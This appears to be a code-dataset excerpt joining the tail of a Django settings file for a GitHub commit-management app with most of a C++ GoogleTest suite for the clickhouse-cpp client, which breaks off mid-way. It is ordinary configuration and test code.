ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'github'
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'hiren.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hiren.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
if 'TRAVIS' in os.environ:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'travisci',
'USER': 'postgres',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'hiren_github_management',
'USER': 'hiren',
'PASSWORD': 'hiren',
'HOST': 'localhost',
'PORT': '',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Dhaka'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
"django.contrib.staticfiles.finders.FileSystemFinder",
"django.contrib.staticfiles.finders.AppDirectoriesFinder"
)
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/'
# CELERY STUFF
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERYBEAT_SCHEDULE = {
'add-every-30-seconds': {
'task': 'github.tasks.get_data',
'schedule': crontab(minute=0, hour='22'), # execute every day at 10 pm
},
}
|
Python
|
MIT
|
pyprism/Hiren-Git-Commit-Management/hiren/settings.py
|
d36c0e32-7146-4604-8400-4c8c0a85726f
|
[]
|
[]
|
#include <clickhouse/client.h>
#include "readonly_client_test.h"
#include "connection_failed_client_test.h"
#include "utils.h"
#include <gtest/gtest.h>
#include <cmath>
using namespace clickhouse;
namespace clickhouse {
std::ostream & operator<<(std::ostream & ostr, const ServerInfo & server_info) {
return ostr << server_info.name << "/" << server_info.display_name
<< " ver "
<< server_info.version_major << "."
<< server_info.version_minor << "."
<< server_info.version_patch
<< " (" << server_info.revision << ")";
}
}
namespace {
uint64_t versionNumber(
uint64_t version_major,
uint64_t version_minor,
uint64_t version_patch = 0,
uint64_t revision = 0) {
// in this case version_major can be up to 1000
static auto revision_decimal_places = 8;
static auto patch_decimal_places = 4;
static auto minor_decimal_places = 4;
auto const result = version_major * static_cast<uint64_t>(std::pow(10, minor_decimal_places + patch_decimal_places + revision_decimal_places))
+ version_minor * static_cast<uint64_t>(std::pow(10, patch_decimal_places + revision_decimal_places))
+ version_patch * static_cast<uint64_t>(std::pow(10, revision_decimal_places))
+ revision;
return result;
}
uint64_t versionNumber(const ServerInfo & server_info) {
return versionNumber(server_info.version_major, server_info.version_minor, server_info.version_patch, server_info.revision);
}
}
// Use value-parameterized tests to run same tests with different client
// options.
class ClientCase : public testing::TestWithParam<ClientOptions> {
protected:
void SetUp() override {
client_ = std::make_unique<Client>(GetParam());
// client_->Execute("CREATE DATABASE IF NOT EXISTS test_clickhouse_cpp");
}
void TearDown() override {
//if (client_)
// client_->Execute("DROP DATABASE test_clickhouse_cpp");
}
template <typename T>
std::shared_ptr<T> createTableWithOneColumn(Block & block)
{
auto col = std::make_shared<T>();
const auto type_name = col->GetType().GetName();
client_->Execute("DROP TEMPORARY TABLE IF EXISTS " + table_name + ";");
client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS " + table_name + "( " + column_name + " " + type_name + " )");
block.AppendColumn("test_column", col);
return col;
}
std::string getOneColumnSelectQuery() const
{
return "SELECT " + column_name + " FROM " + table_name;
}
std::unique_ptr<Client> client_;
const std::string table_name = "test_clickhouse_cpp_test_ut_table";
const std::string column_name = "test_column";
};
TEST_P(ClientCase, Array) {
Block b;
/// Create a table.
client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_array (arr Array(UInt64)) ");
/// Insert some values.
{
auto arr = std::make_shared<ColumnArray>(std::make_shared<ColumnUInt64>());
auto id = std::make_shared<ColumnUInt64>();
id->Append(1);
arr->AppendAsColumn(id);
id->Append(3);
arr->AppendAsColumn(id);
id->Append(7);
arr->AppendAsColumn(id);
id->Append(9);
arr->AppendAsColumn(id);
b.AppendColumn("arr", arr);
client_->Insert("test_clickhouse_cpp_array", b);
}
const uint64_t ARR_SIZE[] = { 1, 2, 3, 4 };
const uint64_t VALUE[] = { 1, 3, 7, 9 };
size_t row = 0;
client_->Select("SELECT arr FROM test_clickhouse_cpp_array",
[ARR_SIZE, VALUE, &row](const Block& block)
{
if (block.GetRowCount() == 0) {
return;
}
EXPECT_EQ(1U, block.GetColumnCount());
for (size_t c = 0; c < block.GetRowCount(); ++c, ++row) {
auto col = block[0]->As<ColumnArray>()->GetAsColumn(c);
EXPECT_EQ(ARR_SIZE[row], col->Size());
for (size_t i = 0; i < col->Size(); ++i) {
EXPECT_EQ(VALUE[i], (*col->As<ColumnUInt64>())[i]);
}
}
}
);
EXPECT_EQ(4U, row);
}
TEST_P(ClientCase, Date) {
Block b;
/// Create a table.
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_date (d DateTime('UTC')) ");
auto d = std::make_shared<ColumnDateTime>();
auto const now = std::time(nullptr);
d->Append(now);
b.AppendColumn("d", d);
client_->Insert("test_clickhouse_cpp_date", b);
client_->Select("SELECT d FROM test_clickhouse_cpp_date", [&now](const Block& block)
{
if (block.GetRowCount() == 0) {
return;
}
EXPECT_EQ(1U, block.GetRowCount());
EXPECT_EQ(1U, block.GetColumnCount());
for (size_t c = 0; c < block.GetRowCount(); ++c) {
auto col = block[0]->As<ColumnDateTime>();
std::time_t t = col->As<ColumnDateTime>()->At(c);
EXPECT_EQ(now, t);
EXPECT_EQ(col->Timezone(), "UTC");
}
}
);
}
TEST_P(ClientCase, LowCardinality) {
Block block;
auto lc = createTableWithOneColumn<ColumnLowCardinalityT<ColumnString>>(block);
const std::vector<std::string> data{{"FooBar", "1", "2", "Foo", "4", "Bar", "Foo", "7", "8", "Foo"}};
lc->AppendMany(data);
block.RefreshRowCount();
client_->Insert(table_name, block);
size_t total_rows = 0;
client_->Select(getOneColumnSelectQuery(),
[&total_rows, &data](const Block& block) {
total_rows += block.GetRowCount();
if (block.GetRowCount() == 0) {
return;
}
ASSERT_EQ(1U, block.GetColumnCount());
if (auto col = block[0]->As<ColumnLowCardinalityT<ColumnString>>()) {
ASSERT_EQ(data.size(), col->Size());
for (size_t i = 0; i < col->Size(); ++i) {
EXPECT_EQ(data[i], (*col)[i]) << " at index: " << i;
}
}
}
);
ASSERT_EQ(total_rows, data.size());
}
TEST_P(ClientCase, LowCardinality_InsertAfterClear) {
// User can successfully insert values after invoking Clear() on LC column.
Block block;
auto lc = createTableWithOneColumn<ColumnLowCardinalityT<ColumnString>>(block);
// Add some data, but don't care about it much.
lc->AppendMany(std::vector<std::string_view>{"abc", "def", "123", "abc", "123", "def", "ghi"});
EXPECT_GT(lc->Size(), 0u);
EXPECT_GT(lc->GetDictionarySize(), 0u);
lc->Clear();
// Now ensure that all data appended after Clear() is inserted properly
const std::vector<std::string> data{{"FooBar", "1", "2", "Foo", "4", "Bar", "Foo", "7", "8", "Foo"}};
lc->AppendMany(data);
block.RefreshRowCount();
client_->Insert(table_name, block);
// Now validate that data was properly inserted
size_t total_rows = 0;
client_->Select(getOneColumnSelectQuery(),
[&total_rows, &data](const Block& block) {
total_rows += block.GetRowCount();
if (block.GetRowCount() == 0) {
return;
}
ASSERT_EQ(1U, block.GetColumnCount());
if (auto col = block[0]->As<ColumnLowCardinalityT<ColumnString>>()) {
ASSERT_EQ(data.size(), col->Size());
for (size_t i = 0; i < col->Size(); ++i) {
EXPECT_EQ(data[i], (*col)[i]) << " at index: " << i;
}
}
}
);
ASSERT_EQ(total_rows, data.size());
}
TEST_P(ClientCase, LowCardinalityString_AsString) {
// Validate that LowCardinality(String) column values can be INSERTed from client as ColumnString
// and also read on client (enabled by special option) as ColumnString.
ClientOptions options = GetParam();
options.SetBakcwardCompatibilityFeatureLowCardinalityAsWrappedColumn(true);
client_ = std::make_unique<Client>(GetParam());
// client_->Execute("CREATE DATABASE IF NOT EXISTS test_clickhouse_cpp");
Block block;
auto col = std::make_shared<ColumnString>();
client_->Execute("DROP TEMPORARY TABLE IF EXISTS " + table_name + ";");
client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS " + table_name + "( " + column_name + " LowCardinality(String) )");
block.AppendColumn("test_column", col);
const std::vector<std::string> data{{"FooBar", "1", "2", "Foo", "4", "Bar", "Foo", "7", "8", "Foo"}};
for (const auto & v : data)
col->Append(v);
block.RefreshRowCount();
client_->Insert(table_name, block);
// Now that we can access data via ColumnString instead of ColumnLowCardinalityT<ColumnString>
size_t total_rows = 0;
client_->Select(getOneColumnSelectQuery(),
[&total_rows, &data](const Block& block) {
total_rows += block.GetRowCount();
if (block.GetRowCount() == 0) {
return;
}
ASSERT_EQ(1U, block.GetColumnCount());
if (auto col = block[0]->As<ColumnString>()) {
ASSERT_EQ(data.size(), col->Size());
for (size_t i = 0; i < col->Size(); ++i) {
EXPECT_EQ(data[i], (*col)[i]) << " at index: " << i;
}
}
}
);
ASSERT_EQ(total_rows, data.size());
}
TEST_P(ClientCase, Generic) {
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_client (id UInt64, name String) ");
const struct {
uint64_t id;
std::string name;
} TEST_DATA[] = {
{ 1, "id" },
{ 3, "foo" },
{ 5, "bar" },
{ 7, "name" },
};
/// Insert some values.
{
Block block;
auto id = std::make_shared<ColumnUInt64>();
auto name = std::make_shared<ColumnString>();
for (auto const& td : TEST_DATA) {
id->Append(td.id);
name->Append(td.name);
}
block.AppendColumn("id" , id);
block.AppendColumn("name", name);
client_->Insert("test_clickhouse_cpp_client", block);
}
/// Select values inserted in the previous step.
size_t row = 0;
client_->Select("SELECT id, name FROM test_clickhouse_cpp_client", [TEST_DATA, &row](const Block& block)
{
if (block.GetRowCount() == 0) {
return;
}
EXPECT_EQ("id", block.GetColumnName(0));
EXPECT_EQ("name", block.GetColumnName(1));
for (size_t c = 0; c < block.GetRowCount(); ++c, ++row) {
EXPECT_EQ(TEST_DATA[row].id, (*block[0]->As<ColumnUInt64>())[c]);
EXPECT_EQ(TEST_DATA[row].name, (*block[1]->As<ColumnString>())[c]);
}
}
);
EXPECT_EQ(sizeof(TEST_DATA)/sizeof(TEST_DATA[0]), row);
}
TEST_P(ClientCase, Nullable) {
/// Create a table.
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_nullable (id Nullable(UInt64), date Nullable(Date)) ");
// Round std::time_t to start of date.
const std::time_t cur_date = std::time(nullptr) / 86400 * 86400;
const struct {
uint64_t id;
uint8_t id_null;
std::time_t date;
uint8_t date_null;
} TEST_DATA[] = {
{ 1, 0, cur_date - 2 * 86400, 0 },
{ 2, 0, cur_date - 1 * 86400, 1 },
{ 3, 1, cur_date + 1 * 86400, 0 },
{ 4, 1, cur_date + 2 * 86400, 1 },
};
/// Insert some values.
{
Block block;
{
auto id = std::make_shared<ColumnUInt64>();
auto nulls = std::make_shared<ColumnUInt8>();
for (auto const& td : TEST_DATA) {
id->Append(td.id);
nulls->Append(td.id_null);
}
block.AppendColumn("id", std::make_shared<ColumnNullable>(id, nulls));
}
{
auto date = std::make_shared<ColumnDate>();
auto nulls = std::make_shared<ColumnUInt8>();
for (auto const& td : TEST_DATA) {
date->Append(td.date);
nulls->Append(td.date_null);
}
block.AppendColumn("date", std::make_shared<ColumnNullable>(date, nulls));
}
client_->Insert("test_clickhouse_cpp_nullable", block);
}
/// Select values inserted in the previous step.
size_t row = 0;
client_->Select("SELECT id, date FROM test_clickhouse_cpp_nullable",
[TEST_DATA, &row](const Block& block)
{
for (size_t c = 0; c < block.GetRowCount(); ++c, ++row) {
auto col_id = block[0]->As<ColumnNullable>();
auto col_date = block[1]->As<ColumnNullable>();
EXPECT_EQ(static_cast<bool>(TEST_DATA[row].id_null),
col_id->IsNull(c));
if (!col_id->IsNull(c)) {
EXPECT_EQ(TEST_DATA[row].id,
col_id->Nested()->As<ColumnUInt64>()->At(c));
}
EXPECT_EQ(static_cast<bool>(TEST_DATA[row].date_null),
col_date->IsNull(c));
if (!col_date->IsNull(c)) {
// Because date column type is Date instead of
// DateTime, round to start second of date for test.
EXPECT_EQ(TEST_DATA[row].date,
col_date->Nested()->As<ColumnDate>()->At(c));
}
}
}
);
EXPECT_EQ(sizeof(TEST_DATA) / sizeof(TEST_DATA[0]), row);
}
TEST_P(ClientCase, Numbers) {
size_t num = 0;
client_->Select("SELECT number, number FROM system.numbers LIMIT 100000", [&num](const Block& block)
{
if (block.GetRowCount() == 0) {
return;
}
auto col = block[0]->As<ColumnUInt64>();
for (size_t i = 0; i < col->Size(); ++i, ++num) {
EXPECT_EQ(num, col->At(i));
}
}
);
EXPECT_EQ(100000U, num);
}
TEST_P(ClientCase, SimpleAggregateFunction) {
const auto & server_info = client_->GetServerInfo();
if (versionNumber(server_info) < versionNumber(19, 9)) {
std::cout << "Test is skipped since server '" << server_info << "' does not support SimpleAggregateFunction" << std::endl;
return;
}
client_->Execute("DROP TEMPORARY TABLE IF EXISTS test_clickhouse_cpp_SimpleAggregateFunction");
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_SimpleAggregateFunction (saf SimpleAggregateFunction(sum, UInt64))");
constexpr size_t EXPECTED_ROWS = 10;
client_->Execute("INSERT INTO test_clickhouse_cpp_SimpleAggregateFunction (saf) SELECT number FROM system.numbers LIMIT 10");
size_t total_rows = 0;
client_->Select("Select * FROM test_clickhouse_cpp_SimpleAggregateFunction", [&total_rows](const Block & block) {
if (block.GetRowCount() == 0)
return;
total_rows += block.GetRowCount();
auto col = block[0]->As<ColumnUInt64>();
ASSERT_NE(nullptr, col);
for (size_t r = 0; r < col->Size(); ++r) {
EXPECT_EQ(r, col->At(r));
}
EXPECT_EQ(total_rows, col->Size());
});
EXPECT_EQ(EXPECTED_ROWS, total_rows);
}
TEST_P(ClientCase, Cancellable) {
/// Create a table.
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_cancel (x UInt64) ");
/// Insert a few blocks. In order to make cancel have effect, we have to
/// insert a relative larget amount of data.
const int kBlock = 10;
const int kRowEachBlock = 1000000;
for (unsigned j = 0; j < kBlock; j++) {
Block b;
auto x = std::make_shared<ColumnUInt64>();
for (uint64_t i = 0; i < kRowEachBlock; i++) {
x->Append(i);
}
b.AppendColumn("x", x);
client_->Insert("test_clickhouse_cpp_cancel", b);
}
/// Send a query which is canceled after receiving the first blockr.
int row_cnt = 0;
EXPECT_NO_THROW(
client_->SelectCancelable("SELECT * FROM test_clickhouse_cpp_cancel",
[&row_cnt](const Block& block)
{
row_cnt += block.GetRowCount();
return false;
}
);
);
/// It's easier to get query cancelled for compress enabled client.
EXPECT_LE(row_cnt, kBlock * kRowEachBlock);
}
TEST_P(ClientCase, Exception) {
/// Create a table.
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_exceptions (id UInt64, name String) ");
/// Expect failing on table creation.
EXPECT_THROW(
client_->Execute(
"CREATE TEMPORARY TABLE test_clickhouse_cpp_exceptions (id UInt64, name String) "),
ServerException);
}
TEST_P(ClientCase, Enum) {
/// Create a table.
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS test_clickhouse_cpp_enums (id UInt64, e Enum8('One' = 1, 'Two' = 2)) ");
const struct {
uint64_t id;
int8_t eval;
std::string ename;
} TEST_DATA[] = {
{ 1, 1, "One" },
{ 2, 2, "Two" },
{ 3, 2, "Two" },
{ 4, 1, "One", },
};
/// Insert some values.
{
Block block;
auto id = std::make_shared<ColumnUInt64>();
auto e = std::make_shared<ColumnEnum8>(Type::CreateEnum8({{"One", 1}, {"Two", 2}}));
int i = 0;
for (auto const& td : TEST_DATA) {
id->Append(td.id);
if (++i % 2) {
e->Append(td.eval);
} else {
e->Append(td.ename);
}
}
block.AppendColumn("id", id);
block.AppendColumn("e", e);
client_->Insert("test_clickhouse_cpp_enums", block);
}
/// Select values inserted in the previous step.
size_t row = 0;
client_->Select("SELECT id, e FROM test_clickhouse_cpp_enums", [&row, TEST_DATA](const Block& block)
{
if (block.GetRowCount() == 0) {
return;
}
EXPECT_EQ("id", block.GetColumnName(0));
EXPECT_EQ("e", block.GetColumnName(1));
for (size_t i = 0; i < block.GetRowCount(); ++i, ++row) {
EXPECT_EQ(TEST_DATA[row].id, (*block[0]->As<ColumnUInt64>())[i]);
EXPECT_EQ(TEST_DATA[row].eval, (*block[1]->As<ColumnEnum8>()).At(i));
EXPECT_EQ(TEST_DATA[row].ename, (*block[1]->As<ColumnEnum8>()).NameAt(i));
}
}
);
EXPECT_EQ(sizeof(TEST_DATA)/sizeof(TEST_DATA[0]), row);
}
TEST_P(ClientCase, Decimal) {
client_->Execute(
"CREATE TEMPORARY TABLE IF NOT EXISTS "
"test_clickhouse_cpp_decimal (id UInt64, d1 Decimal(9, 4), d2 Decimal(18, 9), d3 Decimal(38, 19), "
" d4 Decimal32(4), d5 Decimal64(9), d6 Decimal128(19)) ");
{
Block b;
auto id = std::make_shared<ColumnUInt64>();
auto d1 = std::make_shared<ColumnDecimal>(9, 4);
auto d2 = std::make_shared<ColumnDecimal>(18, 9);
auto d3 = std::make_shared<ColumnDecimal>(38, 19);
auto d4 = std::make_shared<ColumnDecimal>(9, 4);
auto d5 = std::make_shared<ColumnDecimal>(18, 9);
auto d6 = std::make_shared<ColumnDecimal>(38, 19);
EXPECT_THROW(
d1->Append("1234567890123456789012345678901234567890"),
std::runtime_error
);
EXPECT_THROW(
d1->Append("123456789012345678901234567890123456.7890"),
std::runtime_error
);
EXPECT_THROW(
d1->Append("-1234567890123456789012345678901234567890"),
std::runtime_error
);
EXPECT_THROW(
d1->Append("12345678901234567890123456789012345678a"),
std::runtime_error
);
EXPECT_THROW(
d1->Append("12345678901234567890123456789012345678-"),
std::runtime_error
);
EXPECT_THROW(
d1->Append("1234.12.1234"),
std::runtime_error
);
id->Append(1);
d1->Append(123456789);
d2->Append(123456789012345678);
d3->Append(1234567890123456789);
d4->Append(123456789);
d5->Append(123456789012345678);
d6->Append(1234567890123456789);
id->Append(2);
d1->Append(999999999);
d2->Append(999999999999999999);
d3->Append(999999999999999999);
d4->Append(999999999);
d5->Append(999999999999999999);
d6->Append(999999999999999999);
id->Append(3);
d1->Append(-999999999);
d2->Append(-999999999999999999);
d3->Append(-999999999999999999);
d4->Append(-999999999);
d5->Append(-999999999999999999);
d6->Append(-999999999999999999);
// Check strings with decimal point
id->Append(4);
d1->Append("12345.6789");
d2->Append("123456789.012345678");
d3->Append("1234567890123456789.0123456789012345678");
d4->Append("12345.6789");
d5->Append("123456789.012345678");
d6->Append("1234567890123456789.0123456789012345678");
// Check strings with minus sign and without decimal point
id->Append(5);
d1->Append("-12345.6789");
d2->Append("-123456789012345678");
d3->Append("-12345678901234567890123456789012345678");
d4->Append("-12345.6789");
d5->Append("-123456789012345678");
d6->Append("-12345678901234567890123456789012345678");
id->Append(6);
d1->Append("12345.678");
d2->Append("123456789.0123456789");
d3->Append("1234567890123456789.0123456789012345678");
d4->Append("12345.6789");
d5->Append("123456789.012345678");
d6->Append("1234567890123456789.0123456789012345678");
b.AppendColumn("id", id);
b.AppendColumn("d1", d1);
b.AppendColumn("d2", d2);
b.AppendColumn("d3", d3);
b.AppendColumn("d4", d4);
b.AppendColumn("d5", d5);
b.AppendColumn("d6", d6);
client_->Insert("test_clickhouse_cpp_decimal", b);
}
client_->Select("SELECT id, d1, d2, d3, d4, d5, d6 FROM test_clickhouse_cpp_decimal ORDER BY id", [](const Block& b) {
if (b.GetRowCount() == 0) {
return;
}
ASSERT_EQ(6u, b.GetRowCount());
auto int128_to_string = [](Int128 value) {
std::string result;
const bool sign = value >= 0;
if (!sign) {
value = -value;
}
while (value) {
result += static_cast<char>(value % 10) + '0';
value /= 10;
}
if (result.empty()) {
result = "0";
} else if (!sign) {
result.push_back('-');
}
std::reverse(result.begin(), result.end());
return result;
};
auto decimal = [&b](size_t column, size_t row) {
return b[column]->As<ColumnDecimal>()->At(row);
};
EXPECT_EQ(1u, b[0]->As<ColumnUInt64>()->At(0));
EXPECT_EQ("123456789", int128_to_string(decimal(1, 0)));
EXPECT_EQ("123456789012345678", int128_to_string(decimal(2, 0)));
EXPECT_EQ("1234567890123456789", int128_to_string(decimal(3, 0)));
EXPECT_EQ("123456789", int128_to_string(decimal(4, 0)));
EXPECT_EQ("123456789012345678", int128_to_string(decimal(5, 0)));
EXPECT_EQ("1234567890123456789", int128_to_string(decimal(6, 0)));
EXPECT_EQ(2u, b[0]->As<ColumnUInt64>()->At(1));
EXPECT_EQ("999999999", int128_to_string(decimal(1, 1)));
EXPECT_EQ("999999999999999999", int128_to_string(decimal(2, 1)));
EXPECT_EQ("999999999999999999", int128_to_string(decimal(3, 1)));
EXPECT_EQ("999999999", int128_to_string(decimal(4, 1)));
EXPECT_EQ("999999999999999999", int128_to_string(decimal(5, 1)));
EXPECT_EQ("999999999999999999", int128_to_string(decimal(6, 1)));
EXPECT_EQ(3u, b[0]->As<ColumnUInt64>()->At(2));
EXPECT_EQ("-999999999", int128_to_string(decimal(1, 2)));
EXPECT_EQ("-999999999999999999", int128_to_string(decimal(2, 2)));
EXPECT_EQ("-999999999999999999", int128_to_string(decimal(3, 2)));
EXPECT_EQ("-999999999", int128_to_string(decimal(4, 2)));
EXPECT_EQ("-999999999999999999", int128_to_string(decimal(5, 2)));
EXPECT_EQ("-999999999999999999", int128_to_string(decimal(6, 2)));
EXPECT_EQ(4u, b[0]->As<ColumnUInt64>()->At(3));
EXPECT_EQ("123456789", int128_to_string(decimal(1, 3)));
EXPECT_EQ("123456789012345678", int128_to_string(decimal(2, 3)));
EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(3, 3)));
EXPECT_EQ("123456789", int128_to_string(decimal(4, 3)));
EXPECT_EQ("123456789012345678", int128_to_string(decimal(5, 3)));
EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(6, 3)));
EXPECT_EQ(5u, b[0]->As<ColumnUInt64>()->At(4));
EXPECT_EQ("-123456789", int128_to_string(decimal(1, 4)));
EXPECT_EQ("-123456789012345678", int128_to_string(decimal(2, 4)));
EXPECT_EQ("-12345678901234567890123456789012345678", int128_to_string(decimal(3, 4)));
EXPECT_EQ("-123456789", int128_to_string(decimal(4, 4)));
EXPECT_EQ("-123456789012345678", int128_to_string(decimal(5, 4)));
EXPECT_EQ("-12345678901234567890123456789012345678", int128_to_string(decimal(6, 4)));
EXPECT_EQ(6u, b[0]->As<ColumnUInt64>()->At(5));
EXPECT_EQ("123456780", int128_to_string(decimal(1, 5)));
EXPECT_EQ("123456789012345678", int128_to_string(decimal(2, 5)));
EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(3, 5)));
EXPECT_EQ("123456789", int128_to_string(decimal(4, 5)));
EXPECT_EQ("123456789012345678", int128_to_string(decimal(5, 5)));
EXPECT_EQ("12345678901234567890123456789012345678", int128_to_string(decimal(6, 5)));
});
}
// Test special chars in names
TEST_P(ClientCase, ColEscapeNameTest) {
client_->Execute(R"sql(DROP TEMPORARY TABLE IF EXISTS "test_clickhouse_cpp_col_escape_""name_test";)sql");
client_->Execute(R"sql(CREATE TEMPORARY TABLE IF NOT EXISTS "test_clickhouse_cpp_col_escape_""name_test" ("test space" UInt64, "test "" quote" UInt64, "test ""`'[]&_\ all" UInt64))sql");
auto col1 = std::make_shared<ColumnUInt64>();
col1->Append(1);
col1->Append(2);
auto col2 = std::make_shared<ColumnUInt64>();
col2->Append(4);
col2->Append(8);
auto col3 = std::make_shared<ColumnUInt64>();
col3->Append(16);
col3->Append(32);
static const std::string column_names[] = {
"test space",
R"sql(test " quote)sql",
R"sql(test "`'[]&_\ all)sql"
};
static const auto columns_count = sizeof(column_names)/sizeof(column_names[0]);
Block block;
block.AppendColumn(column_names[0], col1);
block.AppendColumn(column_names[1], col2);
block.AppendColumn(column_names[2], col3);
client_->Insert(R"sql("test_clickhouse_cpp_col_escape_""name_test")sql", block);
client_->Select(R"sql(SELECT * FROM "test_clickhouse_cpp_col_escape_""name_test")sql", [] (const Block& sblock)
{
int row = sblock.GetRowCount();
if (row <= 0) {return;}
ASSERT_EQ(columns_count, sblock.GetColumnCount());
for (size_t i = 0; i < columns_count; ++i) {
EXPECT_EQ(column_names[i], sblock.GetColumnName(i));
}
EXPECT_EQ(row, 2);
EXPECT_EQ(sblock[0]->As<ColumnUInt64>()->At(0), 1u);
EXPECT_EQ(sblock[0]->As<ColumnUInt64>()->At(1), 2u);
EXPECT_EQ(sblock[1]->As<ColumnUInt64>()->At(0), 4u);
EXPECT_EQ(sblock[1]->As<ColumnUInt64>()->At(1), 8u);
EXPECT_EQ(sblock[2]->As<ColumnUInt64>()->At(0), 16u);
EXPECT_EQ(sblock[2]->As<ColumnUInt64>()->At(1), 32u);
});
}
// Test roundtrip of DateTime64 values
TEST_P(ClientCase, DateTime64) {
const auto & server_info = client_->GetServerInfo();
if (versionNumber(server_info) < versionNumber(20, 1)) {
std::cout << "Test is skipped since server '" << server_info << "' does not support DateTime64" << std::endl;
return;
}
Block block;
client_->Execute("DROP TEMPORARY TABLE IF EXISTS test_clickhouse_cpp_datetime64;");
client_->Execute("CREATE TEMPORARY TABLE IF NOT EXISTS "
"test_clickhouse_cpp_datetime64 (dt DateTime64(6)) ");
auto col_dt64 = std::make_shared<ColumnDateTime64>(6);
block.AppendColumn("dt", col_dt64);
// Empty INSERT and SELECT
client_->Insert("test_clickhouse_cpp_datetime64", block);
client_->Select("SELECT dt FROM test_clickhouse_cpp_datetime64",
[](const Block& block) {
ASSERT_EQ(0U, block.GetRowCount());
}
);
const std::vector<Int64> data{
-1'234'567'890'123'456'7ll, // approx year 1578
-1'234'567'890'123ll, // 1969-12-17T17:03:52.890123
-1'234'567ll, // 1969-12-31T23:59:58.234567
0, // epoch
1'234'567ll, // 1970-01-01T00:00:01.234567
1'234'567'890'123ll, // 1970-01-15T06:56:07.890123
1'234'567'890'123'456'7ll // 2361-03-21T19:15:01.234567
};
for (const auto & d : data) {
col_dt64->Append(d);
}
block.RefreshRowCount();
// Non-empty INSERT and SELECT
client_->Insert("test_clickhouse_cpp_datetime64", block);
size_t total_rows = 0;
client_->Select("SELECT dt FROM test_clickhouse_cpp_datetime64",
[&total_rows, &data](const Block& block) {
total_rows += block.GetRowCount();
if (block.GetRowCount() == 0) {
return;
}
const auto offset = total_rows - block.GetRowCount();
ASSERT_EQ(1U, block.GetColumnCount());
if (auto col = block[0]->As<ColumnDateTime64>()) {
for (size_t i = 0; i < col->Size(); ++i) {
EXPECT_EQ(data[offset + i], col->At(i)) << " at index: " << i;
}
}
}
);
ASSERT_EQ(total_rows, data.size());
}
INSTANTIATE_TEST_SUITE_P(
Client, ClientCase,
::testing::Values(
ClientOptions()
.SetHost( getEnvOrDefault("CLICKHOUSE_HOST", "localhost"))
.SetPort( std::stoi(getEnvOrDefault("CLICKHOUSE_PORT", "9000")))
.SetUser( getEnvOrDefault("CLICKHOUSE_USER", "default"))
.SetPassword( getEnvOrDefault("CLICKHOUSE_PASSWORD", ""))
.SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB", "default"))
.SetPingBeforeQuery(true),
ClientOptions()
.SetHost( getEnvOrDefault("CLICKHOUSE_HOST", "localhost"))
.SetPort( std::stoi(getEnvOrDefault("CLICKHOUSE_PORT", "9000")))
.SetUser( getEnvOrDefault("CLICKHOUSE_USER", "default"))
.SetPassword( getEnvOrDefault("CLICKHOUSE_PASSWORD", ""))
.SetDefaultDatabase(getEnvOrDefault("CLICKHOUSE_DB", "default"))
.SetPingBeforeQuery(false)
.SetCompressionMethod(CompressionMethod::LZ4)
));
namespace {
using namespace clickhouse;
const auto QUERIES = std::vector<std::string>{"SELECT version()", "SELECT fqdn()", "SELECT buildId()",
"SELECT uptime()", "SELECT filesystemFree()", "SELECT now()"};
}
INSTANTIATE_TEST_SUITE_P(ClientLocalReadonly, ReadonlyClientTest,
::testing::Values(ReadonlyClientTest::ParamType{
ClientOptions()
.SetHost( getEnvOrDefault("CLICKHOUSE_HOST", "localhost"))
.SetPort( std::stoi(getEnvOrDefault("CLICKHOUSE_PORT", "9000")))
.SetUser( getEnvOrDefault("CLICKHOUSE_USER", "default"))
.SetPassword( getEnvOrDefault("CLICKHOUSE_PASSWORD", ""))
